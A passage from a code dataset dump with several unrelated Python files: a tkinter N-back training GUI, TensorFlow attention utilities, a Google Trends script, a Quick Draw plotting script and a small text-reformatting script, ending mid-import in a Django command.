self.__set_up_n_back_grid_size_widget()\r\n self.__set_up_instructions_label()\r\n\r\n def __set_up_input_error_label(self):\r\n self.__error_label = tkinter.Label(self, text=\" \", background = self['background'])\r\n self.__error_label.grid(row=7, column = 0, columnspan=2)\r\n \r\n def __set_up_instructions_label(self):\r\n instructions_label = tkinter.Label(self, text='For new configuration settings to be accepted,\\n either press enter while still in the textbox \\n or change focus out of the textbox.', background=self['background'])\r\n instructions_label.grid(row=9, column = 0, columnspan=2)\r\n \r\n def __validate_float(self, text_input):\r\n try:\r\n float(text_input)\r\n self.__error_label.config(text=\"\")\r\n self.__error_label.config(background = self['background'])\r\n return True\r\n except:\r\n self.__error_label.config(text=\"Input Value must be a number, integer or decimal, to be valid.\")\r\n self.__error_label.config(background = 'red')\r\n return False\r\n \r\n def __validate_int(self, text_input):\r\n try:\r\n int(text_input)\r\n self.__error_label.config(text=\"\")\r\n self.__error_label.config(background = self['background'])\r\n return True\r\n except:\r\n self.__error_label.config(text=\"Input Value must be an integer to be valid.\")\r\n self.__error_label.config(background = 'red')\r\n return False\r\n \r\n def update_all_configuration_settings(self):\r\n \"\"\"to be ran externally to update all settings.\r\n this is for when navigating out of the configuration screen, as normally a\r\n focusout or enter keypress is needed to save the settings, but destroying the screen by \r\n navigating back to the main n back screen doesnt do this. \r\n \"\"\"\r\n self.__update_speed_per_n_function()\r\n self.__update_letters_over_numbers_function()\r\n self.__update_rounds_per_n_back_session_function()\r\n self.__update_events_per_round_function()\r\n self.__update_n_back_grid_size_function()\r\n \r\n def __update_speed_per_n_function(self,*args,**kwargs): \r\n \"\"\"This and the other update setting function have to take *args and **kwargs as they can be triggered by tkiner\r\n events which pass keypressded and mouse coords, etc as arguments and we dont want them but must still be able to take them.\r\n \"\"\"\r\n self.master.master.session_settings.speed_per_n = self.__speed_per_n_entry_StringVar.get()\r\n \r\n def __set_up_speed_per_n_entry_widget(self):\r\n \"\"\"\r\n Set up a label and entry box for the speed per n entry box.\r\n Uses a StringVar, as only this subclass of the variable can be passed to the Tcl tkinter widget as a textvariable, to store the entry in a text entrybox.\r\n The enter button event is bound to a lambda function that called update_speed_per_n to update the speed per n setting in self.master.master.session_settings.speed_per_n,\r\n which is a property and thus triggers the input checking in the session settings class.\r\n \"\"\"\r\n speed_per_n_entry_label = tkinter.Label(self, text=\"Time for each N back event in seconds : \", background = self['background'])\r\n speed_per_n_entry_label.grid(row=0, column=0)\r\n\r\n self.__speed_per_n_entry_StringVar = tkinter.StringVar(value=self.master.master.session_settings.speed_per_n)\r\n \r\n validate_speed_per_n = self.register(self.__validate_float)\r\n \r\n speed_per_n_entry = tkinter.Entry(self, textvariable = self.__speed_per_n_entry_StringVar, validate='all', validatecommand=(validate_speed_per_n, '%P' )) #'%P' text if validation passed\r\n speed_per_n_entry.grid(row=0, column=1)\r\n \r\n speed_per_n_entry.bind('', self.__update_speed_per_n_function )\r\n speed_per_n_entry.bind('', self.__update_speed_per_n_function )\r\n\r\n def __update_letters_over_numbers_function(self,*args,**kwargs):\r\n self.master.master.session_settings.letters_over_numbers = self.__letters_over_numbers_BooleanVar.get()\r\n \r\n def __set_up_letters_over_numbers_widget(self):\r\n \"\"\"\r\n Set up a label and radiobutton for the letters_over_numbers setting\r\n NOte no input validation is needed here as the input values are only true/false - user cannot change that.\r\n \"\"\"\r\n letters_over_numbers_label = tkinter.Label(self,text=\"Numbers or letters for audio part of dual n back events: \", background = self['background'])\r\n letters_over_numbers_label.grid(row=1,column=0)\r\n \r\n self.__letters_over_numbers_BooleanVar = tkinter.BooleanVar(value=self.master.master.session_settings.letters_over_numbers)\r\n\r\n letters_over_numbers_Radiobutton_letters = tkinter.Radiobutton(self, background = self['background'], text=\"Letters\", variable = self.__letters_over_numbers_BooleanVar, value = True, command = self.__update_letters_over_numbers_function )\r\n letters_over_numbers_Radiobutton_letters.grid(row=1, column=1)\r\n \r\n letters_over_numbers_Radiobutton_numbers = tkinter.Radiobutton(self, background = self['background'], text=\"Numbers\", variable = self.__letters_over_numbers_BooleanVar, value = False, command = self.__update_letters_over_numbers_function )\r\n letters_over_numbers_Radiobutton_numbers.grid(row=1, column=2)\r\n \r\n def __update_rounds_per_n_back_session_function(self,*args,**kwargs):\r\n self.master.master.session_settings.rounds_per_n_back_session = self.__rounds_per_n_back_session_StringVar.get() \r\n \r\n def __set_up_rounds_per_n_back_session_widget(self):\r\n \"\"\"\r\n Set up a label and entrybox for the number of rounds per N back session\r\n \"\"\"\r\n rounds_per_n_back_session_label = tkinter.Label(self, text=\"Number of rounds per N back session : \", background = self[\"background\"])\r\n rounds_per_n_back_session_label.grid(row=2, column=0)\r\n \r\n self.__rounds_per_n_back_session_StringVar = tkinter.StringVar(value=self.master.master.session_settings.rounds_per_n_back_session)\r\n \r\n validate_rounds_per_n_back_session = self.register( self.__validate_int )\r\n\r\n rounds_per_n_back_session_entry = tkinter.Entry(self, textvariable = self.__rounds_per_n_back_session_StringVar, validate='all', validatecommand= (validate_rounds_per_n_back_session, '%P') )\r\n rounds_per_n_back_session_entry.grid(row=2, column=1)\r\n \r\n rounds_per_n_back_session_entry.bind('', self.__update_rounds_per_n_back_session_function)\r\n rounds_per_n_back_session_entry.bind('', self.__update_rounds_per_n_back_session_function)\r\n \r\n def __update_events_per_round_function(self,*args,**kwargs):\r\n self.master.master.session_settings.events_per_round = self.__events_per_round_StringVar.get()\r\n \r\n def __set_up_events_per_round_widget(self):\r\n \"\"\"\r\n Set up a label and entrybox for the number of events per N back round\r\n \"\"\"\r\n events_per_round_label = tkinter.Label(self, text=\"Events per N back round : \", background=self[\"background\"])\r\n events_per_round_label.grid(row=3, column=0)\r\n \r\n validate_events_per_round = self.register(self.__validate_int)\r\n \r\n self.__events_per_round_StringVar = tkinter.StringVar(value = self.master.master.session_settings.events_per_round)\r\n\r\n events_per_round_entry = tkinter.Entry(self, textvariable = self.__events_per_round_StringVar, validate='all', validatecommand =(validate_events_per_round, '%P') )\r\n events_per_round_entry.grid(row=3, column=1)\r\n \r\n events_per_round_entry.bind('', self.__update_events_per_round_function )\r\n events_per_round_entry.bind('', self.__update_events_per_round_function )\r\n\r\n\r\n def __update_n_back_grid_size_function(self,*args,**kwargs):\r\n self.master.master.session_settings.n_back_grid_size = self.__n_back_grid_size_StringVar.get() \r\n \r\n \r\n def __set_up_n_back_grid_size_widget(self):\r\n \"\"\"\r\n Set up a label and entrybox for the visual n back gridsize.\r\n \"\"\"\r\n n_back_grid_size_label = tkinter.Label(self, text=\"n back grid size : \", background=self[\"background\"])\r\n n_back_grid_size_label.grid(row=4, column=0)\r\n \r\n self.__n_back_grid_size_StringVar = tkinter.StringVar(value = self.master.master.session_settings.n_back_grid_size)\r\n \r\n validate_n_back_grid_size = self.register(self.__validate_int) # create wrapper around the python function for tcl intpreter. so python gives this to tkinter, which then takes it and does the inside, passes that pback to python.\r\n \r\n n_back_grid_size_entry = tkinter.Entry(self, textvariable = self.__n_back_grid_size_StringVar, validate='all', validatecommand=(validate_n_back_grid_size, '%P'))\r\n n_back_grid_size_entry.grid(row=4, column=1)\r\n \r\n n_back_grid_size_entry.bind('', self.__update_n_back_grid_size_function )\r\n n_back_grid_size_entry.bind('', self.__update_n_back_grid_size_function )\r\n ############################################## correct below for classes above \r\nclass main_GUI_Menu(tkinter.Menu):\r\n \"\"\"\r\n Create the menu of the GUI\r\n ##########\r\n INPUTS:\r\n root = tkinter widget that is the parent of the menus\r\n in this case this should be the self instance of the \r\n main_GUI class(a child class, not to be confused with child widget,\r\n of the tkinter.TK() tlc/tk interpreter class)\r\n\r\n \"\"\"\r\n \r\n def __init__(self, root, *args, **kwargs):\r\n \r\n tkinter.Menu.__init__(self, master = root, *args,**kwargs) #initialise the Menu class.\r\n #self.root = root # not sure if this is good practice to have, exposing the root property to access, but it might be useful?\r\n self.root = root\r\n \r\n cascading_File_Menu = self.create_File_Menu()\r\n self.add_cascade( label=\"File\", menu = cascading_File_Menu)\r\n self.add_command(label=\"N Back Session\", command = self.select_main_screen )\r\n self.add_command(label=\"Configuration Settings\", command = self.select_configuration_screen ) #REWRITE THESE TO USE CREATE DESTROY\r\n self.root.config(menu = self)\r\n \r\n def select_configuration_screen(self):\r\n \"\"\"create the configuration frame.\r\n We want to create and destroy this so that the configuration frame cannot accidentaly be selected when in the main n back screen,\r\n thus preventing keyboard events from triggering the n back game actions.\r\n Once cerated the frame is raised to the top so it is always visible.\r\n \r\n \"\"\"\r\n self.root.configuration_Frame = Configuration_Frame( self.root.main_Frame)\r\n self.root.configuration_Frame.tkraise() \r\n \r\n def select_main_screen(self):\r\n \"\"\"when selecting the n back screen, we want to check if the configuration screen exists and if so delete it.\r\n however before deleting it we update all settings to make sure.\r\n Then raise the main screen to the top for visbility.\r\n \"\"\"\r\n try:\r\n self.root.configuration_Frame.update_all_configuration_settings()\r\n self.root.configuration_Frame.destroy()\r\n finally: \r\n self.root.N_Back_Session_Frame.tkraise()\r\n \r\n \r\n def create_File_Menu(self):\r\n \"\"\"\r\n Create the drop down cascading menu for the file menu.\r\n This must be created before it can be added as a whole menu object to the filemenu.\r\n Takes the main_GUI_Menu class instance as its parent/master object in the tkinter heirachy.\r\n ##########\r\n INPUTS:\r\n self = the tk widget that is to be the parent of the cascading file menu. \r\n RETURNS:\r\n cascading_File_Menu = instance of the file menu.\r\n \"\"\"\r\n cascading_File_Menu = tkinter.Menu(self, tearoff=0) \r\n cascading_File_Menu.add_command(label=\"New Session\", command = self.placeholder_Command )\r\n cascading_File_Menu.add_command(label=\"Save Session\", command = self.save_Session_Data )\r\n cascading_File_Menu.add_command(label=\"Load Session\", command = self.load_Session_Data )\r\n \r\n cascading_File_Menu.add_command(label=\"Exit\", command = self.exit_GUI )\r\n \r\n return cascading_File_Menu\r\n \r\n \r\n def placeholder_Command(self):\r\n print(\"hello, this is a placeholder command that is not implimented yet\")\r\n return None\r\n \r\n \r\n def save_Session_Data(self, from_Quitting=False):\r\n \"\"\"Save the data for the current N back session.\r\n Data to be saved: Number of played rounds, score, N back per round, current N back level.\r\n plus ALL configuration data\r\n All information from the current round is to be thrown away, as saving this is not \r\n compatabile with the N back process- i.e. it would require longer term memory, \r\n not working memeory and thus invalidates the purpose of the training.\r\n \r\n The instance of each session should be a separate class instantiated by the GUI,\r\n Something like self.current_Session\r\n Therefore this function, once completed, will refer to this to get the scores, ect.\r\n ##########\r\n INPUTS:\r\n from_Quitting = boolean flag to indicate whether the data is being saved due to quitting.\r\n if this is true then a, ideally hidden, file should also be created with either\r\n a duplicate of the saved data (assuming the user is allowed to name the file,etc.)\r\n or with the location and filename of the saved, partially complete, session.\r\n Thus upon opening the program, it can check for the prescence of this hidden file \r\n and ask the user if they wish to resume the last session where they left off.\r\n OUTPUTS:\r\n None \r\n \"\"\"\r\n self.placeholder_Command()\r\n \r\n return None\r\n \r\n def new_Session(self):\r\n \"\"\"\r\n Start a new set of rounds for the N back training.\r\n This is done by instantiating the class for a current session.\r\n ##########\r\n INPUTS:\r\n None\r\n OUTPUTS:\r\n None\r\n \"\"\"\r\n self.placeholder_Command() \r\n \r\n return None\r\n \r\n def load_Session_Data(self):\r\n \"\"\"\r\n Load the data for a prior session.\r\n saved data should contain:Number of played rounds, score, N back per round, current N back level.\r\n plus ALL configuration data in the savefile.\r\n This is done by instantiating the class for a current session.\r\n ##########\r\n INPUTS:\r\n None\r\n OUTPUTS:\r\n None\r\n \"\"\"\r\n self.placeholder_Command()\r\n return None\r\n \r\n def exit_GUI(self):\r\n \"\"\"Check that the user wants to quit, and save data of the current session.\r\n Then Exit the GUI if the user selects yes to the quit question.\r\n ##########\r\n INPUTS:\r\n None\r\n OUTPUTS:\r\n None\r\n \"\"\"\r\n \r\n #create dialog box to ask user if they would like to save the session data before exiting\r\n #if yes, go to save data function\r\n #if no, tell them the drones will still dream about them\r\n quit_True_False = tkinter.simpledialog.messagebox.askyesno(title=\"QUIT?\",message=\"Are you sure you would like to quit?\\n(Session data will be autosaved)\")\r\n \r\n if quit_True_False==True:\r\n self.save_Session_Data()\r\n #exit the GUI by desotroying the main_Frame widget\r\n \r\n self.root.destroy()\r\n \r\n return None\r\n\r\nclass main_GUI(tkinter.Tk):\r\n \r\n def __init__(self, *args, **kwargs):\r\n tkinter.Tk.__init__(self, *args, **kwargs)\r\n # this creates the TK interpreter that converts the pyhton TKInter commands into TK commands that are then carried out to create the GUI\r\n #root is the highest level parent(master) widget, all other widgets must be a child(slave) of this widget\r\n\r\n self.main_menu = main_GUI_Menu(self)\r\n \r\n self.main_Frame = self.create_Main_Frame(self)\r\n \r\n self.session_settings = Session_Settings.n_Back_Settings()\r\n \r\n self.N_Back_Session_Frame = n_back_session_Frame(self.main_Frame)\r\n \r\n self.resizable(False, False) # prevent window resizing\r\n \r\n #the mainloop is the TK event loop that actually runs the GUI\r\n self.mainloop()\r\n \r\n \r\n \r\n\r\n def create_Main_Frame(self, root):\r\n \"\"\"Sub function to create the main frame that is to contain all other elements of the GUI.\r\n This is to compartmentalise the parameters, etc.\r\n ##########\r\n INPUTS:\r\n root = root instance of the TK interpreter\r\n OUTPUTS:\r\n main_Frame = instance of the TK Frame widget\r\n \"\"\"\r\n # A child main_frame frame widget is created, with the parent widget being the root widget, which is passed to this main_GUI class on instantiation.\r\n # The Frame instance is stored as a property of the main_GUI class.\r\n #A frame widget is a rectangular region on the screen and is used as a \"geometry master\" for other widgets.\r\n #Basically is is a container, or a FRAME, for other widgets; the placement of other widgets inside of the\r\n #frame allows for more ordered control and, well, placement.\r\n main_Frame = tkinter.Frame(root) \r\n \r\n main_Frame.grid(row=0, column=0) #must use grid implementaiton in parent widget otherwise no child widgets will display- can also use pack\r\n #or palcement placer methods but it is allegedly not advised to use different methods in same program\r\n main_Frame['borderwidth'] = 2\r\n main_Frame['relief'] = 'raised'\r\n main_Frame[\"height\"] = 802\r\n main_Frame[\"width\"] = 802\r\n main_Frame.grid_propagate(False)\r\n \r\n return main_Frame\r\n\r\n\r\n \r\ntest = main_GUI()\r\n \r\n","sub_path":"Main_GUI.py","file_name":"Main_GUI.py","file_ext":"py","file_size_in_byte":25055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508473837","text":"from src.nn_utils.general import get_last_state, exp_mask_for_high_rank, mask_for_high_rank\nfrom src.nn_utils.nn import linear, get_logits, pooling_with_mask, softsel, feature_combination, dropout,\\\n bn_dense_layer\nfrom src.nn_utils.rnn_cell import SwitchableDropoutWrapper\nfrom src.nn_utils.rnn import dynamic_rnn, bidirectional_dynamic_rnn\nimport tensorflow as tf\nfrom src.nn_utils.general import get_last_state, add_reg_without_bias\n\n\ndef traditional_attention(rep_tensor, rep_mask, scope=None,\n keep_prob=1., is_train=None, wd=0., activation='elu',\n tensor_dict=None, name=None):\n bs, sl, vec = tf.shape(rep_tensor)[0], tf.shape(rep_tensor)[1], tf.shape(rep_tensor)[2]\n ivec = rep_tensor.get_shape()[2]\n with tf.variable_scope(scope or 'traditional_attention'):\n rep_tensor_map = bn_dense_layer(rep_tensor, ivec, True, 0., 'bn_dense_map', activation,\n False, wd, keep_prob, is_train)\n\n rep_tensor_logits = get_logits([rep_tensor_map], None, False, scope='self_attn_logits',\n mask=rep_mask, input_keep_prob=keep_prob, is_train=is_train) # bs,sl\n attn_res = softsel(rep_tensor, rep_tensor_logits, rep_mask) # bs,vec\n\n # save attn\n if tensor_dict is not None and name is not None:\n tensor_dict[name] = tf.nn.softmax(rep_tensor_logits)\n\n return attn_res\n\n\ndef multi_dimensional_attention(rep_tensor, rep_mask, scope=None,\n keep_prob=1., is_train=None, wd=0., activation='elu',\n tensor_dict=None, name=None):\n bs, sl, vec = tf.shape(rep_tensor)[0], tf.shape(rep_tensor)[1], tf.shape(rep_tensor)[2]\n ivec = rep_tensor.get_shape()[2]\n with tf.variable_scope(scope or 'multi_dimensional_attention'):\n map1 = bn_dense_layer(rep_tensor, ivec, True, 0., 'bn_dense_map1', activation,\n False, wd, keep_prob, is_train)\n map2 = bn_dense_layer(map1, ivec, True, 0., 'bn_dense_map2', 'linear',\n False, wd, keep_prob, is_train)\n map2_masked = exp_mask_for_high_rank(map2, rep_mask)\n\n soft = tf.nn.softmax(map2_masked, 1) # bs,sl,vec\n attn_output = tf.reduce_sum(soft * rep_tensor, 1) # bs, vec\n\n # save attn\n if tensor_dict is not None and name is not None:\n tensor_dict[name] = soft\n\n return attn_output\n\n\ndef directional_attention_with_dense(rep_tensor, rep_mask, direction=None, scope=None,\n keep_prob=1., is_train=None, wd=0., activation='elu',\n extra_mask=None,\n tensor_dict=None, name=None):\n def scaled_tanh(x, scale=5.):\n return scale * tf.nn.tanh(1./scale * x)\n\n bs, sl, vec = tf.shape(rep_tensor)[0], tf.shape(rep_tensor)[1], tf.shape(rep_tensor)[2]\n ivec = rep_tensor.get_shape()[2]\n with tf.variable_scope(scope or 'directional_attention_%s' % direction or 'diag'):\n # mask generation\n sl_indices = tf.range(sl, dtype=tf.int32)\n sl_col, sl_row = tf.meshgrid(sl_indices, sl_indices)\n if direction is None:\n direct_mask = tf.cast(tf.diag(- tf.ones([sl], tf.int32)) + 1, tf.bool)\n else:\n if direction == 'forward':\n direct_mask = tf.greater(sl_row, sl_col)\n else:\n direct_mask = tf.greater(sl_col, sl_row)\n direct_mask_tile = tf.tile(tf.expand_dims(direct_mask, 0), [bs, 1, 1]) # bs,sl,sl\n rep_mask_tile = tf.tile(tf.expand_dims(rep_mask, 1), [1, sl, 1]) # bs,sl,sl\n attn_mask = tf.logical_and(direct_mask_tile, rep_mask_tile) # bs,sl,sl\n if extra_mask is not None:\n attn_mask = tf.logical_and(attn_mask, extra_mask)\n\n # non-linear\n rep_map = bn_dense_layer(rep_tensor, ivec, True, 0., 'bn_dense_map', activation,\n False, wd, keep_prob, is_train)\n rep_map_tile = tf.tile(tf.expand_dims(rep_map, 1), [1, sl, 1, 1]) # bs,sl,sl,vec\n rep_map_dp = dropout(rep_map, keep_prob, is_train)\n\n # attention\n with tf.variable_scope('attention'): # bs,sl,sl,vec\n f_bias = tf.get_variable('f_bias',[ivec], tf.float32, tf.constant_initializer(0.))\n dependent = linear(rep_map_dp, ivec, False, scope='linear_dependent') # bs,sl,vec\n dependent_etd = tf.expand_dims(dependent, 1) # bs,1,sl,vec\n head = linear(rep_map_dp, ivec, False, scope='linear_head') # bs,sl,vec\n head_etd = tf.expand_dims(head, 2) # bs,sl,1,vec\n\n logits = scaled_tanh(dependent_etd + head_etd + f_bias, 5.0) # bs,sl,sl,vec\n\n logits_masked = exp_mask_for_high_rank(logits, attn_mask)\n attn_score = tf.nn.softmax(logits_masked, 2) # bs,sl,sl,vec\n attn_score = mask_for_high_rank(attn_score, attn_mask)\n\n attn_result = tf.reduce_sum(attn_score * rep_map_tile, 2) # bs,sl,vec\n\n with tf.variable_scope('output'):\n o_bias = tf.get_variable('o_bias',[ivec], tf.float32, tf.constant_initializer(0.))\n # input gate\n fusion_gate = tf.nn.sigmoid(\n linear(rep_map, ivec, True, 0., 'linear_fusion_i', False, wd, keep_prob, is_train) +\n linear(attn_result, ivec, True, 0., 'linear_fusion_a', False, wd, keep_prob, is_train) +\n o_bias)\n output = fusion_gate * rep_map + (1-fusion_gate) * attn_result\n output = mask_for_high_rank(output, rep_mask)\n\n # save attn\n if tensor_dict is not None and name is not None:\n tensor_dict[name + '_dependent'] = dependent\n tensor_dict[name + '_head'] = head\n tensor_dict[name] = attn_score\n tensor_dict[name + '_gate'] = fusion_gate\n return output\n\n\n# -------------- rnn --------------\ndef contextual_bi_rnn(tensor_rep, mask_rep, hn, cell_type, only_final=False,\n wd=0., keep_prob=1.,is_train=None, scope=None):\n \"\"\"\n fusing contextual information using bi-direction rnn\n :param tensor_rep: [..., sl, vec]\n :param mask_rep: [..., sl]\n :param hn:\n :param cell_type: 'gru', 'lstm', basic_lstm' and 'basic_rnn'\n :param only_final: True or False\n :param wd:\n :param keep_prob:\n :param is_train:\n :param scope:\n :return:\n \"\"\"\n with tf.variable_scope(scope or 'contextual_bi_rnn'): # correct\n reuse = None if not tf.get_variable_scope().reuse else True\n #print(reuse)\n if cell_type == 'gru':\n cell_fw = tf.contrib.rnn.GRUCell(hn, reuse=reuse)\n cell_bw = tf.contrib.rnn.GRUCell(hn, reuse=reuse)\n elif cell_type == 'lstm':\n cell_fw = tf.contrib.rnn.LSTMCell(hn, reuse=reuse)\n cell_bw = tf.contrib.rnn.LSTMCell(hn, reuse=reuse)\n elif cell_type == 'basic_lstm':\n cell_fw = tf.contrib.rnn.BasicLSTMCell(hn, reuse=reuse)\n cell_bw = tf.contrib.rnn.BasicLSTMCell(hn, reuse=reuse)\n elif cell_type == 'basic_rnn':\n cell_fw = tf.contrib.rnn.BasicRNNCell(hn, reuse=reuse)\n cell_bw = tf.contrib.rnn.BasicRNNCell(hn, reuse=reuse)\n else:\n raise AttributeError('no cell type \\'%s\\'' % cell_type)\n cell_dp_fw = SwitchableDropoutWrapper(cell_fw,is_train,keep_prob)\n cell_dp_bw = SwitchableDropoutWrapper(cell_bw,is_train,keep_prob)\n\n tensor_len = tf.reduce_sum(tf.cast(mask_rep, tf.int32), -1) # [bs]\n\n (outputs_fw, output_bw), _ = bidirectional_dynamic_rnn(\n cell_dp_fw, cell_dp_bw, tensor_rep, tensor_len,\n dtype=tf.float32)\n rnn_outputs = tf.concat([outputs_fw,output_bw],-1) # [...,sl,2hn]\n\n if wd > 0:\n add_reg_without_bias()\n if not only_final:\n return rnn_outputs # [....,sl, 2hn]\n else:\n return get_last_state(rnn_outputs, mask_rep) # [...., 2hn]\n\n\n# -------------- emb mat--------------\ndef generate_embedding_mat(dict_size, emb_len, init_mat=None, extra_mat=None,\n extra_trainable=False, scope=None):\n \"\"\"\n generate embedding matrix for looking up\n :param dict_size: indices 0 and 1 corresponding to empty and unknown token\n :param emb_len:\n :param init_mat: init mat matching for [dict_size, emb_len]\n :param extra_mat: extra tensor [extra_dict_size, emb_len]\n :param extra_trainable:\n :param scope:\n :return: if extra_mat is None, return[dict_size+extra_dict_size,emb_len], else [dict_size,emb_len]\n \"\"\"\n with tf.variable_scope(scope or 'gene_emb_mat'):\n emb_mat_ept_and_unk = tf.constant(value=0, dtype=tf.float32, shape=[2, emb_len])\n if init_mat is None:\n emb_mat_other = tf.get_variable('emb_mat',[dict_size - 2, emb_len], tf.float32)\n else:\n emb_mat_other = tf.get_variable(\"emb_mat\",[dict_size - 2, emb_len], tf.float32,\n initializer=tf.constant_initializer(init_mat[2:], dtype=tf.float32,\n verify_shape=True))\n emb_mat = tf.concat([emb_mat_ept_and_unk, emb_mat_other], 0)\n\n if extra_mat is not None:\n if extra_trainable:\n extra_mat_var = tf.get_variable(\"extra_emb_mat\",extra_mat.shape, tf.float32,\n initializer=tf.constant_initializer(extra_mat,\n dtype=tf.float32,\n verify_shape=True))\n return tf.concat([emb_mat, extra_mat_var], 0)\n else:\n #with tf.device('/cpu:0'):\n extra_mat_con = tf.constant(extra_mat, dtype=tf.float32)\n return tf.concat([emb_mat, extra_mat_con], 0)\n else:\n return emb_mat\n\n\n","sub_path":"SICK_rl_pub/src/nn_utils/integration_func.py","file_name":"integration_func.py","file_ext":"py","file_size_in_byte":10077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"389670873","text":"import pandas as pd \r\nfrom pytrends.request import TrendReq\r\nfrom datetime import date\r\n\r\ndef llamar_api_gt (timeframe, ticker):\r\n pytrend = TrendReq()\r\n kw_list = [ticker]\r\n pytrend.build_payload(kw_list, cat=0, timeframe=timeframe)\r\n data = pytrend.interest_over_time()\r\n print(data)\r\n return data\r\n\r\ndef obtener_media_semanas (df):\r\n medias = []\r\n i = 0\r\n descuadre = 1\r\n for x in range(len(df)):\r\n descuadre += 1\r\n i += df.iloc[x,0]\r\n if descuadre%7 == 0 and x != 0:\r\n medias.append(i/7)\r\n i = 0\r\n\r\n print(\"Medias semanales:\\n\",medias)\r\n return medias\r\n\r\ndef get_trend (ticker):\r\n timeframe = 'today 3-m' # Informacion de los ultimos tres meses \r\n data = llamar_api_gt(timeframe,ticker)\r\n medias = obtener_media_semanas(data)\r\n diff = []\r\n for i in range(1,len(medias)):\r\n diff.append ( ( medias[i] - medias[i-1] ) * medias[i-1] )\r\n print(\"Diferencias ponderadas:\\n\",diff)\r\n\r\n rango = 0\r\n for d in diff:\r\n rango += abs(d)\r\n print(\"El rango total es:\\n\",rango)\r\n\r\n rango_actual = 0\r\n simbolo_actual = 0\r\n rango_positivo = 0\r\n for d in diff [-1:len(diff)-5:-1]:\r\n rango_positivo += d\r\n rango_actual += abs(d)\r\n print(\"El rango actual es:\\n\",rango_actual)\r\n print(\"El rango positivo es:\\n\",rango_positivo)\r\n ratio = rango_actual/rango # Cuanto aporta los ultimos cambios en volumen respecto al total\r\n print(\"Ratio de trends:\\n\", ratio)\r\n if(rango_positivo>0):\r\n return ratio\r\n else:\r\n return ratio * -1\r\n\r\n \r\n\r\n#print(\"El dato seleccionado es: \",data.iloc[0,0])\r\n#otrodata = data.loc['2021-03-01':'2021-03-02',:]\r\n#print(otrodata)\r\n\r\n\"\"\"todayaux = date.today()\r\ntoday = todayaux.strftime(\"%Y-%m-%d\")\r\nprint(\"Today's date:\", today)\r\ntimeframe2 = '2020-12-01 2021-05-06'\r\ntimeframe3 = '2021-04-01 2021-05-01'\r\ntimeframe4 = '2021-03-01 2021-04-01'\"\"\"","sub_path":"takeprofit/mainapp/googletrends.py","file_name":"googletrends.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"572999465","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n### load the data\napple = np.load('data/full_numpy_bitmap_apple.npy')\naxe = np.load('data/full_numpy_bitmap_axe.npy')\nbutterfly = np.load('data/full_numpy_bitmap_butterfly.npy')\nfan = np.load('data/full_numpy_bitmap_fan.npy')\nhat = np.load('data/full_numpy_bitmap_hat.npy')\n\n### data information\napple = np.c_[apple, np.zeros(len(apple))]\nprint(apple.shape)\n\n\ndef plot_samples(input_array, rows=4, cols=5, title=''):\n '''\n Function to plot 28x28 pixel drawings that are stored in a numpy array.\n Specify how many rows and cols of pictures to display (default 4x5). \n If the array contains less images than subplots selected, surplus subplots remain empty.\n '''\n \n fig, ax = plt.subplots(figsize=(cols,rows))\n ax.axis('off')\n plt.title(title)\n\n for i in list(range(0, min(len(input_array),(rows*cols)) )): \n a = fig.add_subplot(rows,cols,i+1)\n imgplot = plt.imshow(input_array[i,:784].reshape((28,28)), cmap='gray_r', interpolation='nearest')\n plt.xticks([])\n plt.yticks([])\n plt.show()\n\nimport itertools\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n if normalize:\n cm = np.round(cm.astype('float') / cm.sum(axis=1)[:, np.newaxis], 5)\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, cm[i, j],\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n\nplot_samples(apple, title='Sample cat drawings\\n')\n","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534950927","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 14:36:48 2020\n\n@author: philc\n\"\"\"\n\nimport sys\nimport os\n\nfileName = sys.argv[1]\nfileRead = open(fileName,'r')\nnew_file = open(fileName + \".split\", \"w\") # Argh j'ai tout écrasé !\n\n#file = open(\"pos_reference.txt.lima\", \"r\")\n\nlignes = fileRead.readlines() # On parcours les lignes du fichier source\nfor ligne in lignes:\n\twords = ligne.split(' ')\n\n\tligneSortie = \"\"\n\tcpt = 0\n\ttxt = \"\"\n\tfor word in words:\n\t\ttxt += word\n\n\t\tif '_' in word:\n\t\t\t\n\t\t\tcpt += 1\n\t\t\tif cpt < len(words):\n\t\t\t\ttoReplace = txt.split('_')\n\t\t\t\tligneSortie += toReplace[0] + '\\t' + toReplace[1] + '\\n'\n\t\t\telse:\n\t\t\t\tligneSortie += \".\\t.\\n\\n\"\n\t\t\ttxt = \"\"\n\t\telse:\n\t\t\ttxt += ' '\n\t\t\n\tnew_file.write(ligneSortie)\n\nnew_file.close()\nfileRead.close()\n\n'''\nfileRead = open(fileName + \".split\", \"r\")\nnew_file = open(fileName, 'w')\n\nlignes = fileRead.readlines()\nligneSortie = \"\"\nfor ligne in lignes:\n\tligneSortie += ligne\n\nnew_file.write(ligneSortie)\n\nnew_file.close()\nfileRead.close()\n\nos.remove(fileName + \".split\")\n'''\n\n","sub_path":"src/script-split-postagger_colonne.py","file_name":"script-split-postagger_colonne.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"70953925","text":"# -- encoding: UTF-8 --\nimport os\n\nfrom django.contrib.auth import get_user_model\nfrom django.core.management.base import BaseCommand\nfrom 